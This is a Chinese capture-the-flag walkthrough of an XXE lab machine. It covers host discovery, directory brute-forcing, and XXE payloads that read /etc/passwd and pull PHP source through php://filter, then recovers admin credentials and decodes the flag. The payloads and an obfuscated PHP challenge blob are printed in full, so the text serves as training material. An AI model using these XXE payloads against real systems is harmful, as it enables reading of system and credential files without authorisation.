0x01 确定目标IP
目标网络模式默认为net模式,无需修改
使用arp-scan或者netdiscover确定目标ip
arp-scan -l 或者 netdiscover -i eth1 目标ip为 192.168.88.128
探测端口,发现目标机器只开启了80端口
访问web服务发现为apache默认页面,猜测存在隐藏目录
0x02 目录爆破
dirb http://192.168.88.128 只扫到一个robots.txt文件
访问 http://192.168.88.128/robots.txt 一个/xxe/目录,有个后台页面
先访问xxe目录 http://192.168.88.128/xxe/
输入用户名密码进行抓包分析
可以看到用户名密码是通过xml传递给后端的
0x02 xxe漏洞利用
burp抓包,修改post体,尝试读取/etc/passwd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<root><name>&admin;</name><password>1</password></root>
接下来我们可以使用php://filter/read=convert.base64-encode/resource=admin.php读取admin.php的源码。
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>admin</name><password>admin</password></root>
返回包进行了加密,无法直接找到flag
base64解码:找到用户名密码 administhebest/e6e061838856bf47e1de730719fb2609
对password密文进一步解码,获得用户名密码:administhebest/admin@123
使用账户名密码登录admin.php
点击登录出现的一个红色的flag字样
当点击flag会跳转web根目录http://192.168.88.128/flagmeout.php 一个空白页
查看也页面源码获得flag提示
<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->
先进行base32 解码,再进行base64解码
 
查看/etc/.flag.php源码
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&admin;</name><password>admin</password></root>
base64解码:看不懂是啥东西,将返回内容复制保存为php
开启web服务 php -S 0.0.0.0:8090 -t /root
返回的还是刚才那串字符
前后分别加上<?php ?> 重新保存为php
<?php JF9bXSsrOyRfW109JF8uXzskX19fX189JF9bKCsrJF9fW10pXVsoKyskX19bXSkrKCsrJF9fW10pKygrKyRfX1tdKV07JF89JF9bJF9bK19dXTskX19fPSRfXz0kX1srKyRfX1tdXTskX19fXz0kXz0kX1srX107JF8rKzskXysrOyRfKys7JF89JF9fX18uKyskX19fLiRfX18uKyskXy4kX18uKyskX19fOyRfXz0kXzskXz0kX19fX187JF8rKzskXysrOyRfKys7JF8rKzskXysrOyRfKys7JF8rKzskXysrOyRfKys7JF8rKzskX19fPStfOyRfX18uPSRfXzskX19fPSsrJF9eJF9fX1srX107JMOAPStfOyTDgT0kw4I9JMODPSTDhD0kw4Y9JMOIPSTDiT0kw4o9JMOLPSsrJMOBW107JMOCKys7JMODKys7JMODKys7JMOEKys7JMOEKys7JMOEKys7JMOGKys7JMOGKys7JMOGKys7JMOGKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JF9fKCckXz0iJy4kX19fLiTDgS4kw4IuJMODLiRfX18uJMOBLiTDgC4kw4EuJF9fXy4kw4EuJMOALiTDiC4kX19fLiTDgS4kw4AuJMODLiRfX18uJMOBLiTDgi4kw4MuJF9fXy4kw4EuJMOCLiTDgC4kX19fLiTDgS4kw4kuJMODLiRfX18uJMOBLiTDiS4kw4AuJF9fXy4kw4EuJMOJLiTDgC4kX19fLiTDgS4kw4QuJMOGLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOGLiTDgS4kX19fLiTDgS4kw4guJMODLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOILiTDgy4kX19fLiTDgS4kw4YuJMOJLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOELiTDhi4kX19fLiTDgS4kw4QuJMOBLiRfX18uJMOBLiTDiC4kw4MuJF9fXy4kw4EuJMOJLiTDgS4kX19fLiTDgS4kw4kuJMOGLiciJyk7JF9fKCRfKTsK
?>

最新文章

  1. VC++ 应用程序无法正常启动0xc0150002
  2. MVC中的数据注解和验证
  3. Hive 安装配置
  4. Java中的Scoket编程
  5. Python:itertools模块
  6. NOI十连测 第五测 T2
  7. c3p0xml配置详解
  8. android服务Service(上)- IntentService
  9. CMD常用指令
  10. 自己写的python脚本(抄的别人的,自己改了改,用于整理大量txt数据并插入到数据库)
  11. nginx源码分析——configure脚本
  12. LIRe 源代码分析 6:检索(ImageSearcher)[以颜色布局为例]
  13. 帝国cms 不能正常显示最新文章
  14. IDEA 开发环境中设置Subversion,遇到svn安装路径包含空格无法使用版本控制的解决办法
  15. [swarthmore cs75] Lab 0 Warmup &amp; Basic OCaml
  16. Kali-linux使用Metasploit基础
  17. android 监控应用进程
  18. Web 文件上传 目录
  19. maven build 的时候,卡死在Downloading metadata的解决方法
  20. CentOS防SYN攻击

热门文章

  1. Samba与nfs与ftp
  2. Golang 高效实践之defer、panic、recover实践
  3. [leetcode] 456. 132 Pattern (Medium)
  4. Vue的基本使用(二)
  5. 简单粗暴的方式解决eclipse下安装STS失败的问题
  6. bootstrap-treeview后台Json数据的封装及前台的显示
  7. jQuery中事件与动画
  8. RocketMQ中Producer的启动源码分析
  9. Kubernetes容器集群管理环境 - 完整部署(上篇)
  10. TextView 使用详解